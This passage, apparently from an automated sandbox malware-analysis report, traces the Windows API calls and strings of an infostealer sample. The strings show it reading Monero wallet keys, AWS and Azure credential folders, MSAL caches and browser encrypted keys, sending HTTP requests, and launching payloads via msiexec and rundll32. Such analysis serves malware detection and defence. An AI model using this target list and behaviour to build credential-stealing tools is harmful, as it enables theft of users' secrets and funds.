                          • InternetCloseHandle.WININET(00000000), ref: 00AE4EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00AE4EC5
                          • HttpOpenRequestA.WININET(00000000,0179E318,?,0179DDB0,00000000,00000000,00400100,00000000), ref: 00AE4B15
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                          • InternetCloseHandle.WININET(00000000), ref: 00AE4ECF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 460715078-2180234286
                          • Opcode ID: 0ca8474d8f9457e6571f9a187bdec1baf705ecf96cefbb6f599ee609994605ba
                          • Instruction ID: 511202f089c23ac447eecbab992db3fde87fddf281031920fd672569349bd0b8
                          • Opcode Fuzzy Hash: 0ca8474d8f9457e6571f9a187bdec1baf705ecf96cefbb6f599ee609994605ba
                          • Instruction Fuzzy Hash: E412C2B191011CAADB15EB94DD92FFEB778BF24340F5041A9B20A62091DF706F49CFA6
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0179CB90,00000000,?,00B0144C,00000000,?,?), ref: 00AECA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00AECA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00AECA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AECAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00AECAD9
                          • StrStrA.SHLWAPI(?,0179CB00,00B00B52), ref: 00AECAF7
                          • StrStrA.SHLWAPI(00000000,0179CB18), ref: 00AECB1E
                          • StrStrA.SHLWAPI(?,0179D500,00000000,?,00B01458,00000000,?,00000000,00000000,?,01798AB8,00000000,?,00B01454,00000000,?), ref: 00AECCA2
                          • StrStrA.SHLWAPI(00000000,0179D5C0), ref: 00AECCB9
                            • Part of subcall function 00AEC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00AEC871
                            • Part of subcall function 00AEC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00AEC87C
                          • StrStrA.SHLWAPI(?,0179D5C0,00000000,?,00B0145C,00000000,?,00000000,01798AC8), ref: 00AECD5A
                          • StrStrA.SHLWAPI(00000000,01798808), ref: 00AECD71
                            • Part of subcall function 00AEC820: lstrcat.KERNEL32(?,00B00B46), ref: 00AEC943
                            • Part of subcall function 00AEC820: lstrcat.KERNEL32(?,00B00B47), ref: 00AEC957
                            • Part of subcall function 00AEC820: lstrcat.KERNEL32(?,00B00B4E), ref: 00AEC978
                          • lstrlen.KERNEL32(00000000), ref: 00AECE44
                          • CloseHandle.KERNEL32(00000000), ref: 00AECE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: 38ec42ce049787056fe3e2f4b29286e77806fcffc75e197eea9dd08d775fb07d
                          • Instruction ID: 6e67245c94540e557a051d44ff0c704d3cacc830ae3995f13fbdf4128a9fa081
                          • Opcode Fuzzy Hash: 38ec42ce049787056fe3e2f4b29286e77806fcffc75e197eea9dd08d775fb07d
                          • Instruction Fuzzy Hash: 90E1EEB190010CABDB14EBE4DD91FEEB778AF24340F404169F20AA7191DF706A4ACBA5
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          • RegOpenKeyExA.ADVAPI32(00000000,0179AD88,00000000,00020019,00000000,00B005B6), ref: 00AF83A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00AF8426
                          • wsprintfA.USER32 ref: 00AF8459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00AF847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 00AF848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00AF8499
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 3246050789-3278919252
                          • Opcode ID: fbaf7d8df167b1a374aac63ac4fb99f3fa54023f369a15e971ec10506047bff3
                          • Instruction ID: 7607aca2db3fe1a399b922f80e9a3d6f3835a5a1b101e5749a8f3cb744c8d207
                          • Opcode Fuzzy Hash: fbaf7d8df167b1a374aac63ac4fb99f3fa54023f369a15e971ec10506047bff3
                          • Instruction Fuzzy Hash: 57810FB191011C9BDB24DB94CD91FEAB7B8FB14700F008699F209A6150DF756B86CFA1
                          APIs
                            • Part of subcall function 00AF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AF8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF4DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00AF4DCD
                            • Part of subcall function 00AF4910: wsprintfA.USER32 ref: 00AF492C
                            • Part of subcall function 00AF4910: FindFirstFileA.KERNEL32(?,?), ref: 00AF4943
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF4E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00AF4E59
                            • Part of subcall function 00AF4910: StrCmpCA.SHLWAPI(?,00B00FDC), ref: 00AF4971
                            • Part of subcall function 00AF4910: StrCmpCA.SHLWAPI(?,00B00FE0), ref: 00AF4987
                            • Part of subcall function 00AF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00AF4B7D
                            • Part of subcall function 00AF4910: FindClose.KERNEL32(000000FF), ref: 00AF4B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF4EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00AF4EE5
                            • Part of subcall function 00AF4910: wsprintfA.USER32 ref: 00AF49B0
                            • Part of subcall function 00AF4910: StrCmpCA.SHLWAPI(?,00B008D2), ref: 00AF49C5
                            • Part of subcall function 00AF4910: wsprintfA.USER32 ref: 00AF49E2
                            • Part of subcall function 00AF4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00AF4A1E
                            • Part of subcall function 00AF4910: lstrcat.KERNEL32(?,0179E328), ref: 00AF4A4A
                            • Part of subcall function 00AF4910: lstrcat.KERNEL32(?,00B00FF8), ref: 00AF4A5C
                            • Part of subcall function 00AF4910: lstrcat.KERNEL32(?,?), ref: 00AF4A70
                            • Part of subcall function 00AF4910: lstrcat.KERNEL32(?,00B00FFC), ref: 00AF4A82
                            • Part of subcall function 00AF4910: lstrcat.KERNEL32(?,?), ref: 00AF4A96
                            • Part of subcall function 00AF4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00AF4AAC
                            • Part of subcall function 00AF4910: DeleteFileA.KERNEL32(?), ref: 00AF4B31
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: 44be18e10be3288d21edf8324f2c9187de13313e9665f6d773555c37196f5ce8
                          • Instruction ID: 1310deb7cfe49704b9406cda62a05ff9ecada813c020545a82ea847aa82945e5
                          • Opcode Fuzzy Hash: 44be18e10be3288d21edf8324f2c9187de13313e9665f6d773555c37196f5ce8
                          • Instruction Fuzzy Hash: DF4198B9A4030867DB14F7B0ED47FED7778AB64700F004994B289661C1FEB457C99BA2
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00AF906C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: b2fc03f35333279c498af3f6001f35d82e51e136e97953a13eac6ff3b35a8b4a
                          • Instruction ID: d16ff422dc0115a439567a301e6fe0b45b9c67043f3fc6d71e06044bd3d1dff0
                          • Opcode Fuzzy Hash: b2fc03f35333279c498af3f6001f35d82e51e136e97953a13eac6ff3b35a8b4a
                          • Instruction Fuzzy Hash: F671EAB1910308ABDB14EBE8DD89FEEB7B8FB58700F108518F615E7290DB34A905CB61
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00AF31C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00AF335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00AF34EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: a77bc27ddbfb92ffa5206e6e68f7771524c0feaf4d0f8416d4c744ff25776984
                          • Instruction ID: 1794620a87898fa212b6c9e0fe1e99f361fe97fc91c134d22da553d7045a8235
                          • Opcode Fuzzy Hash: a77bc27ddbfb92ffa5206e6e68f7771524c0feaf4d0f8416d4c744ff25776984
                          • Instruction Fuzzy Hash: 55120FB191010C9ADB15FBD0CE92FFDB778AF24340F504169F60A66195EF742B4ACBA2
                          APIs
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                            • Part of subcall function 00AE6280: InternetOpenA.WININET(00B00DFE,00000001,00000000,00000000,00000000), ref: 00AE62E1
                            • Part of subcall function 00AE6280: StrCmpCA.SHLWAPI(?,0179E258), ref: 00AE6303
                            • Part of subcall function 00AE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AE6335
                            • Part of subcall function 00AE6280: HttpOpenRequestA.WININET(00000000,GET,?,0179DDB0,00000000,00000000,00400100,00000000), ref: 00AE6385
                            • Part of subcall function 00AE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00AE63BF
                            • Part of subcall function 00AE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AE63D1
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AF5318
                          • lstrlen.KERNEL32(00000000), ref: 00AF532F
                            • Part of subcall function 00AF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AF8E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00AF5364
                          • lstrlen.KERNEL32(00000000), ref: 00AF5383
                          • lstrlen.KERNEL32(00000000), ref: 00AF53AE
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: 3c78f17495243142edd96236ff1a9232c7ab2b8e934179ef138638f1ec0832b3
                          • Instruction ID: b0647122c4ca839b9339af9caf03fcedd2d01684695932142a9168c0ddf7f2fb
                          • Opcode Fuzzy Hash: 3c78f17495243142edd96236ff1a9232c7ab2b8e934179ef138638f1ec0832b3
                          • Instruction Fuzzy Hash: 4F51FF7091014C9BDB18FFA4CE96EFD7779AF20341F508018F60A9A591EF746B46CBA2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: fc7e1e884e99f2560eb6ddbfcbef1413a00f550503abed4f4fed6b8be142c935
                          • Instruction ID: cdd0fdb835aa49dd53aa11514584a69720b2c23f0cce30c2017836d5c56d71c9
                          • Opcode Fuzzy Hash: fc7e1e884e99f2560eb6ddbfcbef1413a00f550503abed4f4fed6b8be142c935
                          • Instruction Fuzzy Hash: A5C166B590021D9BCB14EFA0DD89FFA7778BF64304F004598F60A97241DB74AA85CFA1
                          APIs
                            • Part of subcall function 00AF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AF8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF42EC
                          • lstrcat.KERNEL32(?,0179DAE0), ref: 00AF430B
                          • lstrcat.KERNEL32(?,?), ref: 00AF431F
                          • lstrcat.KERNEL32(?,0179CCC8), ref: 00AF4333
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AF8D90: GetFileAttributesA.KERNEL32(00000000,?,00AE1B54,?,?,00B0564C,?,?,00B00E1F), ref: 00AF8D9F
                            • Part of subcall function 00AE9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00AE9D39
                            • Part of subcall function 00AE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AE99EC
                            • Part of subcall function 00AE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AE9A11
                            • Part of subcall function 00AE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AE9A31
                            • Part of subcall function 00AE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AE148F,00000000), ref: 00AE9A5A
                            • Part of subcall function 00AE99C0: LocalFree.KERNEL32(00AE148F), ref: 00AE9A90
                            • Part of subcall function 00AE99C0: CloseHandle.KERNEL32(000000FF), ref: 00AE9A9A
                            • Part of subcall function 00AF93C0: GlobalAlloc.KERNEL32(00000000,00AF43DD,00AF43DD), ref: 00AF93D3
                          • StrStrA.SHLWAPI(?,0179DD38), ref: 00AF43F3
                          • GlobalFree.KERNEL32(?), ref: 00AF4512
                            • Part of subcall function 00AE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AE4EEE,00000000,00000000), ref: 00AE9AEF
                            • Part of subcall function 00AE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00AE4EEE,00000000,?), ref: 00AE9B01
                            • Part of subcall function 00AE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AE4EEE,00000000,00000000), ref: 00AE9B2A
                            • Part of subcall function 00AE9AC0: LocalFree.KERNEL32(?,?,?,?,00AE4EEE,00000000,?), ref: 00AE9B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF44A3
                          • StrCmpCA.SHLWAPI(?,00B008D1), ref: 00AF44C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00AF44D2
                          • lstrcat.KERNEL32(00000000,?), ref: 00AF44E5
                          • lstrcat.KERNEL32(00000000,00B00FB8), ref: 00AF44F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: 1cada7d76a555174a07657b51d408eb8ac0b196715b12ba6ec844532cc368d70
                          • Instruction ID: 64ed0e45064b42b45fd19fe5f1fb96b4a67a2ee7d8da1708aebc2204e3803112
                          • Opcode Fuzzy Hash: 1cada7d76a555174a07657b51d408eb8ac0b196715b12ba6ec844532cc368d70
                          • Instruction Fuzzy Hash: 8D7156B6900208ABCB14FBE4DD85FEE7779AB98300F044598F60997181EA75DB45CBA1
                          APIs
                            • Part of subcall function 00AE12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AE12B4
                            • Part of subcall function 00AE12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00AE12BB
                            • Part of subcall function 00AE12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00AE12D7
                            • Part of subcall function 00AE12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00AE12F5
                            • Part of subcall function 00AE12A0: RegCloseKey.ADVAPI32(?), ref: 00AE12FF
                          • lstrcat.KERNEL32(?,00000000), ref: 00AE134F
                          • lstrlen.KERNEL32(?), ref: 00AE135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00AE1377
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AF8B60: GetSystemTime.KERNEL32(00B00E1A,01799AF0,00B005AE,?,?,00AE13F9,?,0000001A,00B00E1A,00000000,?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AF8B86
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00AE1465
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                            • Part of subcall function 00AE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AE99EC
                            • Part of subcall function 00AE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AE9A11
                            • Part of subcall function 00AE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AE9A31
                            • Part of subcall function 00AE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AE148F,00000000), ref: 00AE9A5A
                            • Part of subcall function 00AE99C0: LocalFree.KERNEL32(00AE148F), ref: 00AE9A90
                            • Part of subcall function 00AE99C0: CloseHandle.KERNEL32(000000FF), ref: 00AE9A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 00AE14EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
